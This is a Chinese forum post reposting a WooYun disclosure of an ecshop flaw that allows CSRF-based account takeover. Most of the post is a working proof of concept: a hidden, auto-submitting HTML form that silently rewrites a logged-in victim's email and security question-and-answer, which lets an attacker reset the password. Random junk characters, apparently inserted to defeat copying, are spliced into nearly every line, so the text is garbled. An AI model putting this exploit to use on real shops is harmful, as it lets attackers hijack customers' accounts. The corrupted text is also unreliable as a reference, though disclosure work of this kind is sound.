找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2098|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
& C2 r3 q. {% F0 Z+ a; Kecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现: x6 W: I0 @$ I3 S# ~

( E$ f% s  f# }. }$ |" @5 SDemo For:http://www.wooyun.org/bug.php?action=view&id=395
+ W2 r/ w# D: X, m5 ?4 x
8 ?4 z% f! t0 ?: M  a详细说明:( E! U) |8 S3 a) X. p
利用csrf和xss可以突破官方所说的“障碍”
1 s: b( L- Y# @xss版本已经有人说明  v1 |1 M/ s2 q5 ^' ]
这里给出csrf版本
" }% n3 i# @! G+ y$ x$ t
& V; e- G, }$ T! A6 u4 y( J* l3 C! I7 w( z漏洞证明:; M. ?( |1 H0 i9 L
<html>( m7 m+ V  f' @, B& g. |
<body>- H) E/ z8 S# h4 Q8 {
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">8 B) ~$ u/ ~) Q  L! A: C! o
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">2 N  F5 H$ ]' L/ }% v2 F# [
<INPUT TYPE="text" NAME="act" value="act_edit_profile">+ R9 P7 {8 o& l" ~# j
<INPUT TYPE="text" NAME="sel_question" value="ecshop">6 n' E5 `# c0 J' C: _- ~9 v' U- q
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
1 U+ D3 H2 A5 Y  ]: M</body>* v+ z! c8 F+ v6 B" T" a$ [
<script>
8 }) D" c) b( l5 _document.forms[0].submit();
4 j+ \9 N- D; b  }: Z</script>- F6 L2 @) ]- c' Q- S
</html>
0 ~) b1 _' G- ]- b+ b/ v构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失7 d1 q; ]+ y( e  q

4 _+ w5 O: ~: r2 G# k- _* P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表